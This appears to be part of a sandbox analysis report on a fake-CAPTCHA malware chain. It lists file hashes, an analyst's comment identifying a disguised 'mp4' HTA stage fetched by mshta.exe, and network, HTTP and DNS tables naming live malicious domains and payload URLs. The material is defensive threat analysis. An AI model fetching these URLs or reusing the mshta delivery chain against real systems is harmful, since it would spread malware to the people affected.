MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3808 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 39FE545802DAE4D8D6812C42A12EF064
SHA256: 190F5E9CA5F4778A6CD2603EFAA31481F4A9D4696FB721FF1BC3C292A1067E75
1488 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
MD5: 03B2BFD0E9FA09284B7B6BE80AB70FD7
SHA256: 92D1F3A86A8E17CEC98840CA2D291E2E073147448E6C459792FA68F0944ABF9D

The four __PSScriptPolicyTest_* files share one hash because they are the identical probe files PowerShell writes to %TEMP% at startup to test whether AppLocker or WDAC script enforcement applies; they are not payload drops. The one file worth pulling from the sandbox is sh_ykxto[1].mp4, the IE cache copy of https://b1.exploredairyaptitude.shop/sh_ykxto.mp4 that mshta.exe was redirected to (see HTTP requests): a 512 Kb "mp4" fetched by the HTML Application host is the HTA stage, not a video.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 23
DNS requests: 8
Threats: 0

HTTP requests (PID | process | method | HTTP code | IP | URL | CN | type | size | reputation; "-" marks a cell the report leaves empty)

- | - | GET | 302 | 104.21.16.1:443 | https://solve.porw.org/awjsx.captcha?u=ff0c0b18-0056-47b0-9efd-2a9e88ea7e43 | unknown | - | - | -
2040 | svchost.exe | GET | 200 | 23.48.23.182:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.182:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
2040 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 104.26.14.134:443 | https://b1.exploredairyaptitude.shop/sh_ykxto.mp4 | unknown | binary | 512 Kb | -
- | - | GET | 200 | 172.67.70.185:443 | https://d1.exploredairyaptitude.shop/sh.bin | unknown | text | 9.27 Mb | -

Connections (PID | process | IP | domain | ASN | CN | reputation; "-" marks a cell the report leaves empty)

2040 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2164 | mshta.exe | 104.21.32.1:443 | solve.porw.org | CLOUDFLARENET | - | unknown
2040 | svchost.exe | 23.48.23.182:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2164 | mshta.exe | 172.67.70.185:443 | b1.exploredairyaptitude.shop | CLOUDFLARENET | US | unknown
4712 | MoUsoCoreWorker.exe | 23.48.23.182:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
solve.porw.org
  • 104.21.32.1
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.80.1
  • 104.21.64.1
  • 104.21.16.1
unknown
crl.microsoft.com
  • 23.48.23.182
  • 23.48.23.162
  • 23.48.23.168
  • 23.48.23.173
  • 23.48.23.170
  • 23.48.23.154
  • 23.48.23.171
  • 23.48.23.177
  • 23.48.23.163
whitelisted
b1.exploredairyaptitude.shop
  • 172.67.70.185
  • 104.26.15.134
  • 104.26.14.134
unknown
www.microsoft.com
  • 23.35.229.160
whitelisted
d1.exploredairyaptitude.shop
  • 104.26.14.134
  • 104.26.15.134
  • 172.67.70.185
unknown
self.events.data.microsoft.com
  • 20.189.173.9
whitelisted

Threats

No threats detected
No debug info